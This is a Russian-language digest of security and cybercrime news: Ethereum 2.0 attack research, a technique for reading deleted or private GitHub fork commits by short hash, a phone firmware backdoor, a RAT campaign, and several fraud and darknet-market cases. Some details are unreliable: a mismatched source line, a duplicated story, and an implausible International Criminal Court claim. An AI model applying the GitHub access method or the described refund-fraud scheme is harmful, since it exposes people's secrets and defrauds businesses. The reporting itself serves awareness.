Источник: xakep.ru/2021/04/19/firefox-88-ftp-off/
Исследователи из Гарвардского университета описали две стратегии атаки на Beacon Chain Эфириума 2.0: злонамеренные реорганизации блоков и отсрочки окончательности, а также оценили их стоимость.
Четверо исследователей Школы инженерных и прикладных наук Гарвардского университета - Майкл Нойдер (Michael Neuder), Дэниел Мороз (Daniel Moroz), Ритвик Рао (Rithvik Rao) и Дэвид К. Паркеск (David Parkesk), описали два возможных варианта атаки на «сигнальную цепочку» Эфириума 2.0.
В рамках первой стратегии злоумышленник может подтвердить неправильный блок, инициируя так называемые «частные форки». Подтверждение одного «неправильного» блока вызовет лишь незначительную реорганизацию, но этот сценарий может быть расширен до проведения разрушительных атак.
Второй сценарий включает в себя задержку «окончательности» (finality) блока. Гипотетический злоумышленник может отсрочить окончательность, препятствуя подтверждению правильного блока. В этом сценарии атакующий должен быть распознан как предлагающий границу блока и, следовательно, первый блок следующей эпохи. Злоумышленнику необходимо отложить окончательность, то есть гарантировать, что два последовательных блока не будут проверены своевременно. Этот сценарий менее вероятен и намного дороже.
Для оценки стоимости первой атаки сначала необходимо оценить стоимость 30% заблокированных для стейкинга ETH в Ethereum 2.0, которые должен контролировать злоумышленник для проведения атаки. Согласно Etherscan, сейчас на депозитном контракте Ethereum 2.0 заблокированы ETH стоимостью более $6.6 млрд.
Таким образом, сейчас злоумышленник должен потратить почти $2 млрд (а по мере развития сети эта цифра будет расти в соответствии с увеличением заблокированных для стейкинга ETH). Как только эта веха будет достигнута, в первом сценарии атакующий должен дополнительно потратить (n-1) долларов США на каждую реорганизацию длиной n, где n - число злонамеренно проверенных блоков. Реализация второго сценария атаки потребует от $500 до $1200 за каждую серию отсрочек окончательности. Оба варианта предполагают вероятность успешной атаки около 9%.
• Source: https://arxiv.org/pdf/2102.02247.pdf
Компания Truffle Security [опубликовала](https://trufflesecurity.com/blog/anyone-can-access-deleted-and- private-repo-data-github) сценарии атак на несколько типовых приёмов работы с репозиториями на GitHub, позволяющие извлечь данные из удалённых репозиториев, у которых имеются публичные форки или которые были созданы как форки.
Возможность доступа к коммитам по хэшу во всех связанных форками репозиториях вызвано тем, что GitHub в целях оптимизации и исключения дубликатов хранит вместе все объекты из основного репозитория и форков, лишь логически разделяя принадлежность коммитов. Подобное хранение позволяет просмотреть в основном репозитории любой коммит из любого форка, явно указав его хэш в URL. Например, пользователь может создать форк репозитория "/torvalds/linux" и добавить в него любой код, после чего этот код станет [доступен](https://github.com/torvalds/linux/blob/b4061a10fc29010a610ff2b5b20160d7335e69bf/drivers/hid/hid- samsung.c#L113-L118) по прямой хэш-ссылке в репозитории "/torvalds/linux". В случае удаления репозитория, если имеется хотя бы один публичных форк, данные из удалённого репозитория остаются доступны по хэшу коммита.
Предлагается три сценария, представляющих угрозу безопасности:
• Первый сценарий затрагивает ситуации, когда разработчики создают форки публичных репозиториев, добавляют в них изменения, экспериментируют, а затем удаляют. Помимо утечки кода, который не предназначен для публикации, опасность представляет ситуация, когда в экспериментах в код файлов с примерами добавляются рабочие ключи доступа к API. В этом случае атакующий может получить доступ к изменению по хэшу коммита, адресуемому после удаления форка через основной репозиторий. Например, предложенным способом исследователи смогли определить 30 рабочих ключей доступа к API, изучив три связанных с машинным обучением репозитория с большим числом форков.
• Второй сценарий касается возможности получения доступа к данным после удаления первичного репозитория, если для этого репозитория были созданы форки. В качестве примера приводится случай, когда в публичном репозитории одной компании были случайно опубликованы закрытые ключи одного из сотрудников, позволяющие получить полный доступ ко всем репозиториям данной компании на GitHub. Компания удалила репозиторий через который была утечка, но ключи по-прежнему остались доступны для извлечения через обращения по хэшу коммита в репозиториях с форками.
• Третий сценарий связан с моделью разработки проектов, которые развивают базовую открытую версию в публичном репозитории и расширенную проприетарную версию в приватном. Если компания изначально развивала проект в приватном репозитории, а затем после открытия кода проекта перевела его в разряд публичных, но продолжила разработку закрытой внутренней или расширенной версии в приватном форке, имеется возможность доступа к добавленным в приватный форк изменениям по хэшам коммитов через публичный репозиторий. При этом доступ возможен только к изменениям, добавленным в приватный форк до перевода основного репозитория в разряд публичных (хранилища приватных и публичных репозиториев разделяются, но когда два репозитория были приватными коммиты хранились совместно, поэтому остались в репозитории после его перевода в разряд публичных).
Трюк, позволяющий получить доступ к коммитам в форках репозитория через ссылку на основной репозиторий, известен уже много лет и периодически используется для различных шуток и ввода в заблуждение разработчиков (например, шутники периодически подобным образом создают видимость подстановки бэкдоров в репозиторий с ядром Linux на GitHub). В качестве меры для противодействия подобным шуткам GitHub добавил предупреждение о том, что запрошенный коммит не относится к веткам в текущем репозитории и возможно принадлежит форку. При этом сама возможность доступа к коммитам по хэшу в любых связанных форками репозиториях рассматривалась как безобидная, так как для обращения к данным в удалённых и приватных форках требуется знание хэша коммита.
Подобрать хэш коммита, формируемый на базе алгоритма SHA-1 и включающий 32 символа, не реально, но оказалось, что это и не требуется. GitHub поддерживает сокращённую форму обращения к коммитам, позволяющую адресовать изменения по нескольким первым символам хэша, если отсутствуют пересечения с другими коммитами. Минимальное число символов для сокращённой адресации хэша - 4, что соответствует перебору всего 65 тысяч комбинаций (16^4). При этом перебор может и не потребоваться, так как API GitHub позволяет подключать обработчики для перехвата событий, которые используются сторонними проектами, ведущими архив с полным логом всех операций, в котором информация о хэшах коммитов остаётся и после удаления репозиториев.
Верховный кассационный суд Кувейта принял решение освободить от уголовной ответственности известного кувейтского хакера, взломавшего сотни сайтов по всему миру, включая сайт Пентагона.
Хакер обвинялся в проникновении на сайт Министерства обороны США, получении доступа к секретным данным о вооружении и взломе 200 американских сайтов. Некоторые из сайтов содержали конфиденциальную информацию, принадлежащую США.
Верховный кассационный суд поддержал вердикт Апелляционного суда, согласно которому 28-летний обвиняемый не может быть привлечён к ответственности за преступления, совершенные 10 лет назад (взломы происходили в период с 2010 по 2012 годы).
9 октября 2023 года Международный уголовный суд (МУС) прекратил уголовное дело против хакера. Суд также снял обвинение в том, что Кувейт подверг отношения с США риску разрыва из-за взлома сайта Минобороны.
Кроме того, хакер обвинялся присвоении денег мошенническим путём, используя взломанный сайт для привлечения жертв к подписке за просмотр контента. Суд признал, что хакерская деятельность не может быть преследована по закону из-за истечения срока давности, что вызвало неоднозначные эмоции среди общественности и специалистов по кибербезопасности.
• Source: https://english[.]aawsat.com/gulf/5042484-kuwait-court-drops-case- against-notorious-pentagon-hacker
Росфинмониторинг обязали обращать особое внимание на доверенности, связанные с открытием счетов в банках. Речь идет в первую очередь о ситуациях, в которых доверителями выступают лица, не достигшие 30-летнего возраста, а к выявлению подозрительных документов будут привлекать нотариусов.
«Массово стали приходить молодые люди, выдавать доверенность на широкий круг лиц, как правило, до 10 человек. По фамилиям видно, что эти лица проживают в разных регионах, никак не связаны с доверителем. И на вопросы нотариуса доверитель не может ответить, для чего эта доверенность нужна. То есть это явно не стандартные бытовые доверенности, когда, например, человек может уехать в командировку и хочет, чтобы кто-то из его родственников имел возможность снять и перевести деньги», — отметил председатель комиссии по методической работе Московской городской нотариальной палаты Дмитрий Точкин.
Click to expand...
Он добавил, что в число схем, в которые могут быть вовлечены такие заявители, входят незаконный вывод денежных средств, их обналичивание, а также незаконные криптовалютные операции. При этом массовый характер явление, по его наблюдениям, приняло в середине 2023 года.
«Конечно, есть пробел в регулировании. Просто наличие подозрений не является основанием для отказа по всем нотариальным действиям, только для исполнительных надписей. В скором времени уже появится закон, который расширяет возможности нотариуса и даст ему возможность отказывать в совершении нотариальных действий при наличии подозрений», — пообещал Точкин.
Click to expand...
Пока же этого не случилось, нотариусы будут постфактум уведомлять о заверенной доверенности Росфинмониторинг, а уже оттуда сведения поступят в правоохранительные органы. При этом, по данным российского Центробанка, в 2023 году 76 процентов операций по обналичиванию незаконно полученных средств провели как раз с помощью пластика, оформленного на физические лица, а также p2p-переводов. Общая сумма может достигать 45 миллиардов рублей.
sc: kommersant.ru/doc/6680383
Создав аккаунт под видом женщины, злоумышленник длительное время общался с потерпевшим в интернете и обманул на деньги. Установлена причастность афериста к 11 эпизодам мошеннических действий. Сейчас ему грозит до трех лет лишения свободы.
В дежурную часть управления полиции в метрополитене поступило сообщение от гражданина о том, что его обманули через сайт знакомств.
Как рассказал следователь управления полиции в метрополитене Павел Сирош, оперативниками и следователями управления полиции в метрополитене совместно с сотрудниками Департамента киберполиции доказана причастность фигуранта к 11 эпизодам мошеннических действий:
"В ходе реализации оперативной информации мы выяснили, что 21-летний уроженец города Никополь в течение длительного времени налаживал общение с пострадавшим, создав фейковую страницу на сайте знакомств. Под видом одинокой женщины познакомился в потерпевшим и выманивал у него денежные средства. За время общения злоумышленнику удалось завладеть суммой более 20 тысяч гривен ".
Правоохранители установили местонахождение правонарушителя. Во время обыска по его месту жительства следователи изъяли доказательства причастности мужчины к совершению им мошеннических действий и задержали его в порядке ст. 208 Уголовного процессуального кодекса Украины.
Следователями следственного отдела управления полиции в метрополитене по согласованию Подольской окружной прокуратуры фигуранту сообщено о подозрении в совершении уголовного правонарушения, предусмотренного ч. 2 ст. 190 Уголовного кодекса Украины - мошенничество. Санкция статьи предусматривает штраф от трех до четырех тысяч необлагаемых минимумов доходов граждан или исправительными работами на срок от одного до двух лет, или ограничением свободы на срок до пяти лет, или лишением свободы на срок до трех лет.
Сейчас правонарушителю избрана мера пресечения в виде ночного домашнего ареста.
Мужчина создал сайт-клон известной сети магазинов.
38-летний одессит создал и администрировал копию сайта известной сети, которая занимается продажей электроники. От настоящего он отличался только одной буквой в названии.
Об этом сообщили в пресс-службе ГУНП.
Мошенник предлагал широкий выбор товаров по низким ценам и с условием предоплаты. Получив от покупателя деньги на карту, он переставал выходить на связь. Для максимальной конспирации жулик использовал VPN-сервис и общался с посетителями сайта через встроенный чат.
Киберполиция вышла на след предприимчивого одессита и провела обыски в местах его проживания. У подозреваемого нашли телефоны, банковские карты и другие доказательства преступной деятельности. Сейчас известно о 13-ти жертвах интернет-мошенника из разных городов Украины, которых он «кинул» на 50 тысяч гривен. Но в полиции уверяют, что пострадавших намного больше. Решается вопрос об избрании для мужчины меры пресечения.
Ему грозит от трех до восьми лет тюрьмы.
• Source: [https://odessa.online/kiberpolitsiy...yj-prodaval- nesushhestvuyushhuyu-elektroniku/](https://odessa.online/kiberpolitsiya- zaderzhala-v-odesse-internet-zhulika-kotoryj-prodaval-nesushhestvuyushhuyu- elektroniku/)
Visa предупредила о росте активности новой версии вредоносного ПО JsOutProx, нацеленного на финансовые учреждения и их клиентов. Кампания затронула учреждения Южной и Юго-Восточной Азии, Ближнего Востока и Африки.
Новый троян удаленного доступа (Remote Access Trojan, RAT) распространяется в рамках фишинговой кампании с 27 марта, как заявило издание BleepingComputer, ссылаясь на утверждения Подразделения по борьбе с мошенничеством в Visa (Payment Fraud Disruption, PFD).
JsOutProx, впервые обнаруженный в декабре 2019 года, представляет собой сильно обфусцированный JavaScrip-бэкдор, который позволяет операторам запускать команды оболочки, загружать дополнительные полезные данные, выполнять файлы, делать снимки экрана, сохранять постоянство на зараженном устройстве, а также управлять клавиатурой и мышью.
Цель кампании до конца не выяснена, однако предполагается, что злоумышленники могли нацелиться на финансовые учреждения с целью проведения мошеннических операций. Visa предложила ряд мер по смягчению последствий, включая повышение осведомленности о рисках фишинга, использование технологий EMV и безопасного приема платежей, защиту удаленного доступа и мониторинг подозрительных транзакций.
Специалисты Resecurity в своем отчете раскрыли подробности фишинговой операции, отмечая, что вредоносное ПО эволюционировало, улучшая свою способность к уклонению от обнаружения и используя GitLab для хостинга своих загрузок.
Жертвам по электронной почте отправлялись поддельные уведомления от лица официальных учреждений с приложенными ZIP-архивами, содержащими JavaScript- файлы. При запуске файлов на компьютер загружается вредоносное ПО JsOutProx.
Новая модификация вредоносного ПО включает в себя инструменты для изменения настроек прокси, управления DNS для перенаправления и маскировки трафика, кражи данных из буфера обмена и обхода двухфакторной аутентификации за счет кражи одноразовых паролей. Аналитики предполагают, что за атаками может стоять китайская группировка, учитывая сложность атак, профиль целей и их географическое положение.
Власти США арестовали гражданина Китая Майлза Го по обвинениям в организации связанного с криптовалютами мошенничества на сумму более $1 млрд.
В Минюсте США пояснили, что Го также известен под именами Хо Ван Квок, Майлз Квок, Го Вэнги, Brother Seven и «Директор».
Чиновники указали, что Го и его сообщник Кин Мин Джи, также известный как Уильям Джи, «обманным путем побудили» тысячи подписчиков профинансировать онлайн-клуб под названием G |CLUBS.
Преступники получили $262 млн через запущенную ими криптобиржу Himalaya. Последняя запустила стейблкоин Himalaya Dollar и utility-токен Himalaya Coin.
Го и Джи обвинили по 12 пунктам, по которым им грозят суммарно 215 лет тюремного заключения каждому. Джи остается на свободе.
Власти США арестовали гражданина Китая Майлза Го по обвинениям в организации связанного с криптовалютами мошенничества на сумму более $1 млрд.
В Минюсте США пояснили, что Го также известен под именами Хо Ван Квок, Майлз Квок, Го Вэнги, Brother Seven и «Директор».
Чиновники указали, что Го и его сообщник Кин Мин Джи, также известный как Уильям Джи, «обманным путем побудили» тысячи подписчиков профинансировать онлайн-клуб под названием G |CLUBS.
Преступники получили $262 млн через запущенную ими криптобиржу Himalaya. Последняя запустила стейблкоин Himalaya Dollar и utility-токен Himalaya Coin.
Го и Джи обвинили по 12 пунктам, по которым им грозят суммарно 215 лет тюремного заключения каждому. Джи остается на свободе.
source: justice[.]gov/usao-sdny/pr/ho-wan-kwok-aka-miles-guo-arrested- orchestrating-over-1-billion-dollar-fraud-conspiracy
Суд в Лондоне отправил в тюрьму на пять лет злоумышленника, грабившего обладателей криптовалют. Примечательно, что грабил он их не через интернет, а самым что ни на есть традиционным способом — с помощью ножа и угроз жизни.
Осужденный Карим Хассан (Karim Hassan) возрастом 21 год связывался с потенциальными жертвами через Snapchat и предлагал им помощь в обмене криптовалют на классическую валюту. При личной встрече Хассан усаживал жертву на заднее сиденье своего автомобиля Audi A6 и требовал отдать ему смартфон и цифровые кошельки. Ответом на любые возражения были угрозы физической расправы и изнасилования. Хассан иногда заявлял, что он «убийца, которому нечего терять», очевидно, чтобы еще сильнее запугать жертву.
Один из пострадавших лишился таким образом криптовалюты на сумму около 20 тыс.
британских фунтов — с приставленным к горлу ножом ему ничего не оставалось
кроме как подчиниться требованиям грабителя.
В другом случае Хассан вместе с подельником сразу же принялись избивать
очередного клиента, угрожая раздеть и изнасиловать его. Жертва, Абдуллахи
Голоид (Abdullahi Goloid) отдал грабителю 2,5 тыс. фунтов.
Впрочем, Голоид запомнил номера машины Хассана и сообщил об инциденте в полицию. Спустя несколько дней Хассана задержали, а при обыске машины нашли кредитную карту одной из жертв, которая опознала грабителя.
Непростое дело
Несмотря на свидетельства и улики, дело оказалось для следователей непростым. Как указывается в материале издания Bleeping Computer, установить связь между криптотранзакциями и продемонстрировать, что какие бы то ни было денежные средства переходили из рук в руки с одного криптокошелька на другой, в юридической плоскости оказалось проблемой. И все же Хассан признал себя виновным по трем эпизодам грабежа и был приговорен к пяти годам тюремного заключения.
Его защите удалось добиться мягкого приговора, ссылаясь на достаточно молодой возраст подсудимого и серьезные проблемы в его семье. За преступную деятельность Хассан, кондитер по профессии, взялся после того, как из-за пандемийных ограничений 2020 г. оказался без работы и средств к существованию.
Хассан — далеко не единственный, кто промышлял грабежом по отношению к владельцев криптовалют. Подобных историй уже довольно много. Издание TheGuardian отмечает растущее количество уличных криптограбежей, когда злоумышленники попросту отбирали смартфон и криптокошелек у жертв, после чего переводили криптовалюты на свои собственные кошельки или куда-то еще.
«Криптокошелек — материальный объект, отобрать его не сложнее, чем бумажник, — говорит Алексей Водясов, технический директор компании SEQ. — Выяснить пароли у жертвы, к горлу которой приставили нож, тоже несложно. В истории с Хассаном, однако, любопытно другое: зачем жертвы пытались обналичить криптовалютные активы таким сомнительным образом. Возможно, Хассан рассчитывал, что его потенциальным жертвам самим было что скрывать, так что полицию вовлекать они не станут.
Суд вынес приговор украинцу за распространение вредоносного ПО, предназначенного для слежки за пользователями смартфонов.
В марте 2020 года к уроженцу Умани обратился мужчина с просьбой установить программу на смартфон своей девушки, чтобы можно было отслеживать ее общение в мессенджерах и соцсетях. После этого, подсудимый через сеть Интернет загрузил специальное ПО под названием SystemUpdater_v.6.8apk на свой компьютер, которое в дальнейшем установил на смартфон, предоставленный заказчиком. За это он получил 500 гривен наличными. Согласно заключению эксперта, данное ПО может использоваться как вредоносное программное средство, а именно обеспечивать несанкционированный доступ постороннего лица к информации, хранящейся в мобильном телефоне.
Допрошенный в судебном заседании обвиняемый свою вину в содеянном признал полностью.
Суд признал мужчину виновным и назначил наказание в виде штрафа в размере 2000 необлагаемых минимумов доходов граждан, что составляет 34000 гривен. Кроме штрафа, суд обязал подсудимого оплатить 22882 грн за проведение экспертиз.
История началась с того, что малой откопал на просторах Telegram схему с возвратом средств за заказы из доставки сети магазинов Магнит и все заверте... На протяжении целой недели обрыган делал заказы всякой сьедобной (и не очень) х#йни типа энергосов, забирал ништяки у курьеров, а потом жаловался в техподдержку, мол нихуя не получил. Таким образом малой умудрился рефнуть товаров на общую сумму в 66 000 рублей. И да, это срабатывало каждый раз.
Разумеется, тонна возвратов по одному и тому же адресу не могла пройти мимо внимания сотрудников службы безопасности магазина. Безопасник накатал заяву в полицию и соплежуя моментально пробили по камерам.
В итоге 16-летний школоеб был задержан прямо в день получения школьного аттестата. В свою защиту гений преступного мира заявил, что он просто очень сильно хотел кушать.
Никогда не ел еды
Источник: журнал Хакер.

](https://xakep.ru/2024/07/16/digma-backdoor/)
«Коммерсант» сообщает, что специалист обнаружил бэкдор в телефонах Digma. Он позволяет управлять телефоном удаленно, в том числе рассылать SMS-сообщения и принимать их, передавать данные на сторонние серверы, регистрировать на номер телефона жертвы аккаунты в мессенджерах и так далее.
 xakep.ru
«Коммерсант» сообщает, что специалист обнаружил бэкдор в телефонах Digma (принадлежит российской дистрибуторской компании «Мерлион»). Он позволяет управлять телефоном удаленно, в том числе рассылать SMS-сообщения и принимать их, передавать данные на сторонние серверы, регистрировать на номер телефона жертвы аккаунты в мессенджерах и так далее.
Ссылаясь на неназванный «источник в отрасли кибербезопасности», который столкнулся с проблемой, журналисты пишут, через месяц после покупки кнопочного телефона Digma и подключения новой SIM-карты на этот номер, без ведома пользователя, был зарегистрирован аккаунт в WhatsApp.
«Анализ прошивки гаджета показал наличие заражения. Вредоносные функции внедрены для того, чтобы использовать номер телефона владельца»,— считает собеседник издания.
Click to expand...
По словам неназванного специалиста, телефон с определенной периодичностью обращается к удаленному серверу, передавая такие данные, как IMEI- идентификатор, идентификатор SIM-карты и оператора связи. Сервер в ответ отправляет устройству команду: отправить SMS с заданным текстом на конкретный номер, вывести полученное сообщение на экран. При этом отправленные и принятые сообщения не сохраняются в памяти телефона.
В ответ на обращения пользователя специалисты Digma ответили, что отмечают «аномалии» в работе прошивки устройства, однако наличие уязвимости не подтвердили.
Стоит отметить, что еще в 2021 году ИБ-специалист, известный под ником ValdikSS, посвятил проблеме троянов и бэкдоров в простейших кнопочных телефонах большую статью. Тогда он рассказывал, что в российской рознице встречаются устройства «со встроенным трояном, отправляющим платные SMS-сообщения на короткие номера, текст которого загружается с сервера, также бывают устройства с настоящим бэкдором, пересылающим входящие SMS-сообщения на сервер злоумышленников».
Теперь, после выхода публикации в «Коммерсанте», ValdikSS сообщил, что речь идет о модели Digma A172, которую он изучает уже несколько месяцев. Ниже приводим его комментарий полностью.
«Бэкдор хороший: когда с сервера приходит команда на отправку СМС (или когда получена входящая СМС при установленном фильтре), визуально нет никакой индикации о каком-либо событии, предусмотрели даже скрытие иконки выхода в интернет ("G" у силы сети).
Данные шифруются RC5 с динамическим ключом, для обмена используется BSON.
На первых этапах функции СМС используются для того, чтобы узнать номер владельца: одному телефону, номер которого уже известен, сервер устанавливает фильтр входящих сообщений, а второму дает команду на отправку СМС на номер первого. Первый телефон пересылает номер и текст полученного СМС на сервер. В тексте содержится уникальный идентификатор, позволяющий связать номер телефона с другими известными идентификаторами телефона.
Впоследствии вредонос может использоваться для регистрации аккаунтов в мессенджерах и на сервисах, требующих подтверждения по СМС, но происходит это не сразу — активность телефона отслеживается по времени с момента его включена, количеству принятых СМС и другим параметрам, чтобы затруднить обнаружение бэкдора.
Я позвонил по одному из номеров, который сервер сообщил для отправки СМС — женщина на том конце подтвердила, что получила от меня СМС "с какими-то цифрами" и уточнила, что ранее SIM стояла в кнопочном телефоне, а сейчас установлена в смартфон.
Digma только что, после статьи в "Коммерсанте", закрыла тикет с формулировкой "Так, закрыли обсуждение". До этого они утверждали, что интернет используется для обновления доступности и цен сервиса подписок Funbox, несмотря на то, что в более свежей прошивке, на телефон с которой зарегистрировали WhatsApp, его нет», — пишет исследователь.Click to expand...
Издание CNews приводит комментарий представителей Digma, который в компании дали после выхода публикаций в СМИ:
«В кнопочных телефонах Digma отсутствует функционал, который можно классифицировать как backdoor или встроенную уязвимость. В прошивку встроен функционал от стороннего российского сервиса, целью которого является обмен SMS-сообщениями фиксированного формата для персонализации доступных развлекательных и информационных сервисов в конкретном регионе – гороскопы, погода, анекдоты и т.д. Обмен сообщениями такого типа является полностью бесплатным для пользователей. Подключение платных услуг ведется только с явного согласия пользователя. Любой иной функционал, включая якобы скрытую регистрацию пользователей в мессенджерах, в устройствах Digma отсутствует. Наши маркетинговые исследования показывают, что вышеуказанный развлекательный функционал является наиболее востребованным среди пользователей кнопочных телефонов, таким образом, основным нашим намерением встраивания данного функционала в прошивку является улучшение клиентского опыта. Изъятие телефонов из продажи мы не планируем, так как не видим оснований для этого. Мы запланируем внеочередное независимое тестирование наших устройств на предмет поиска уязвимостей в прошивке кнопочных телефонов у крупных независимых компаний и опубликуем результаты», — заявили в компании.
Click to expand...
Напомним, что это далеко не первый раз, когда в прошивках бюджетных устройств обнаруживают бэкдоры и малварь. К примеру, в прошлом году специалисты Trend Micro предупреждали, что зачастую дешевые мобильные устройства на Android, включая телефоны, смарт-часы, телевизоры и другие девайсы заражаются вредоносным ПО, даже не успев покинуть завод, на котором их произвели.
Инстаграмер, известный как Jay Mazini, признал вину в отмывании денег с использованием биткоинов. Теперь блогеру грозит до 20 лет лишения свободы.
В марте прошлого года Джебара Игбара (Jebara Igbara) был обвинен Министерством юстиции США в краже биткоинов у своих подписчиков. Недавно подсудимый признал себя виновным в федеральном суде по трем пунктам обвинения: криптовалютное мошенничество с использованием электронных средств, сговор для совершения неправомерных действий и отмывание денег. Согласно судебным документам, до марта 2021 года Игбара вел учетную запись в Instagram под псевдонимом Jay Mazini, публикуя видео о бесплатной раздаче крупных сумм денег в обмен на биткоины.
Злоумышленник обещал людям выплаты, значительно превышающие стоимость биткоина. Получив BTC, обвиняемый отправлял жертвам поддельные скриншоты, якобы подтверждающие перечисление обещанных денег на банковский счет. Естественно, на самом деле никаких платежей людям не приходило. Итого инвесторы были обмануты на сумму как минимум в $8 млн.
Игбара также обвиняется в обмане членов мусульманско-американской общины Нью- Йорка. Блогер обещал, что их деньги будут направлены на инвестиции в акции и средства индивидуальной защиты от коронавируса. Однако на самом деле инстаграмер присвоил деньги, потратив на личные расходы и азартные игры.
Продвижение криптовалют пользователями соцсетей с большим количеством подписчиков вызывает серьезные вопросы у юристов. Многие специалисты по правовым вопросам считают, что оговорка об отказе от ответственности за возможные финансовые потери пользователей не сможет защитить криптовалютных блогеров от суда.
source: justice[.]gov/usao-edny/pr/instagram-personality-known-jay-mazini- pleads-guilty-wire-fraud-wire-fraud-conspiracy
Хакан Айик думал, что помогает сообщникам преступника, когда предложил им использовать зашифрованное приложение для связи, но как итог - проиграл ФБР.

Предполагаемому австралийскому наркобарону, которого обманом заставили раскрыть информацию о сотнях организованных преступников, приказали сдаться ради собственной безопасности.
Хакан Айик, который, как полагают, сейчас живет в Турции, подумал, что помогает сообщникам преступника, когда предложил им использовать зашифрованное приложение для связи.
Чего он не знал, так это того, что его обманули сотрудники федеральной полиции Австралии (AFP) и ФБР.
Приложение ANOM предположительно предлагало безопасные зашифрованные
сообщения. Фото: Федеральная полиция Австралии
Агенты под прикрытием дали Айику телефонную трубку с приложением ANOM, а затем
порекомендовали другим сообщникам службу обмена сообщениями.
"Его опознали из-за его положения в преступном мире", - сказал старший следователь, которого цитирует the Australian Telegraph.
"Он был главной мишенью как человек, которому доверяли и который мог успешно распространять эту платформу".
В ходе рейдов было изъято оружие.
Однако комиссар AFP Рис Кершоу заявил, что теперь это сделало его мишенью.
"Учитывая угрозу, с которой он сталкивается, ему лучше сдаться нам как можно скорее", - сказал он.
"Он был одним из координаторов этого конкретного устройства, так что он, по сути, подставил своих коллег.
"Чем скорее он сдастся, тем лучше для него и его семьи".
Сотни людей были арестованы, а планы убийств сорваны после того, как преступные группировки были обманом заставлены использовать приложение.
В общей сложности во время рейдов было обнаружено около 3,7 тонны наркотиков.
Совместное расследование, проведенное ФБР, Европолом и AFP, показало, что
американские чиновники взяли под контроль приложение для обмена зашифрованными
сообщениями ANOM в 2018 году.
План был задуман после того, как ФБР отключило предыдущее защищенное приложение, пользующееся популярностью у преступников - Phantom Secure.
В нем ANOM загружался на специальные мобильные телефоны, которые затем покупались преступниками на черном рынке, с зашифрованной службой обмена сообщениями, скрытой в функции калькулятора.
Считалось, что в обращении находилось около 12 000 устройств, и пользователям требовался код от существующего пользователя для доступа к приложению, что создавало элемент доверия.
Полицейские силы по всему миру смогли получить доступ к 27 миллионам сообщений, разоблачающих работу организованных преступных синдикатов в более чем 100 странах, сообщил во вторник заместитель директора Европола по операциям.
Австралийская полиция арестовала более 200 подозреваемых после взлома
приложения для обмена сообщениями underworld. Фото: Федеральная полиция
Австралии
Операция была описана как "одна из крупнейших и изощренных" в истории
Европола.
Это было связано:
• Более 20 000 зашифрованных устройств, используемых 300 преступниками в более
чем 100 странах
• 27 миллионов сообщений были просмотрены за 18 месяцев
• По меньшей мере 800 арестов в 700 местах с обысками
ФСБ пресекла деятельность москвича, который причастен к распространению вредоносного программного обеспечения через Telegram. Об этом ТАСС сообщили в пресс-службе УФСБ России по городу Москве и Московской области.
"УФСБ России по городу Москве и Московской области пресечена противоправная деятельность жителя Москвы 1990 года рождения, причастного к распространению компьютерной программы, заведомо предназначенной для несанкционированного уничтожения, модифицирования и копирования компьютерной информации", - сказали в пресс-службе.
Москвич находил покупателей вредоносного ПО через администрируемый им сайт. "Для приобретения программы клиенту необходимо было связаться с администратором ресурса в мессенджере Telegram. После получения сведений о произведенной оплате продавец отправлял покупателю файл, содержащий ПО, ключ активации и поясняющее видео", - добавили в спецслужбе.
В отношении москвича возбуждено уголовное дело по ч. 2 ст. 273 УК РФ (создание, использование и распространение вредоносных компьютерных программ, совершенные из корыстной заинтересованности). Санкция инкриминируемой ему статьи предусматривает наказание до пяти лет лишения свободы.
Через 10 месяцев после внезапного возрождения AlphaBay удалось вернуть себе позиции лидера в цифровом подполье.
Уже не один год подпольные торговые площадки и правоохранительные органы играют в бесконечную чехарду – как только удается отключить один подпольный маркет, так сразу же появляется новый. Однако редко бывает так, чтобы отключенная однажды торговая площадка возвращалась спустя полдесятилетия и завоевывала статус лидера на черном рынке. А ведь именно так и произошло в случае с AlphaBay, прошлым и будущим «королем» контрабандной экономики.
В июле 2017 года в рамках операции Bayonet правоохранительным органам удалось отключить AlphaBay, изъять центральный сервер в Литве и арестовать создателя сайта Александра Казеса (Alexandre Cazes) в Бангкоке. Однако в августе прошлого года второй администратор AlphaBay, ИБ-эксперт, известный как DeSnake, вдруг возник из ниоткуда и объявил о восстановлении торговой площадки в улучшенном виде. Теперь, спустя 10 месяцев, благодаря серии отключений и таинственных исчезновений ряда маркетплейсов обновленный AlphaBay уверенно возвращает себе позиции лидера в цифровом подполье. По некоторым данным, сайту уже удалось это сделать.
«Да, в настоящее время AlphaBay – маркетплейс номер один в даркнете. Я уже раньше говорил, что мы станем номером один. И я уже говорил, что раз я так сказал, то так и будет», – сообщил DeSnake в переписке с журналистами издания WIRED.
Заявление нового администратора сайта хотя бы частично имеют под собой основания. Так, на прошлой неделе на AlphaBay насчитывалось более 30 тыс. выставленных на продажу уникальных товаров (в основном это наркотики, но есть также много вредоносных программ и краденых данных). Для сравнения, в сентябре прошлого года на сайте продавалось всего 500 товаров.
На еще одной старой торговой площадке под названием ASAP опубликовано более 50 тыс. объявлений о продаже, но продавцы ASAP часто дублируют свои предложения. По данным Flashpoint, AlphaBay в начале года насчитывал более 1,3 тыс. активных продавцов, тогда как ASAP – порядка 1 тыс. Другие форумы в даркнете, в частности Archetyp и Incognito, насчитывают всего несколько тысяч или даже сотен объявлений о продаже. Из всего этого следует, что AlphaBay действительно может быть самым популярным маркетплейсом среди продавцов в даркнете в настоящее время.
Как бы то ни было, но количество товаров, продающихся сейчас на AlphaBay, представляет собой лишь малую толику всего ассортимента, предлагавшегося покупателям на момент закрытия сайта в 2017 году (350 тыс. товаров). В то время торговая площадка по праву считалась самой крупной за всю историю даркнета.
По подсчетам ФБР, AlphaBay по размерам в 10 раз превышал легендарный подпольный маркетплейс Silk Road. Согласно Chainalysis, ежедневно на AlphaBay осуществляются сделки купли-продажи в среднем на $2 млн. Однако, по словам DeSnake, доход сайта пока не достиг максимального уровня 2017 года.
Когда в прошлом году AlphaBay вдруг восстал из пепла, многие аналитики предположили, что за «воскрешением» сайта стоят правоохранительные органы. Однако с тех пор DeSnake удалось подтвердить свою личность как бывшего соратника создателя AlphaBay. К примеру, он подписывал свои сообщения тем же криптографическим ключом PGP, которым пользовался раньше.
По словам DeSnake, он разработал несколько способов защиты, которые позволят ему идти на шаг впереди правоохранительных органов. В частности, он находится на территории одной из бывших советских республик, у которой нет соглашения об экстрадиции с США. Кроме того, маркетплейс использует не биткойны, а Monero, что усложняет анализ блокчейна специалистами.
Американское казначейство призывает усилить регулирование децентрализованного финансового сектора
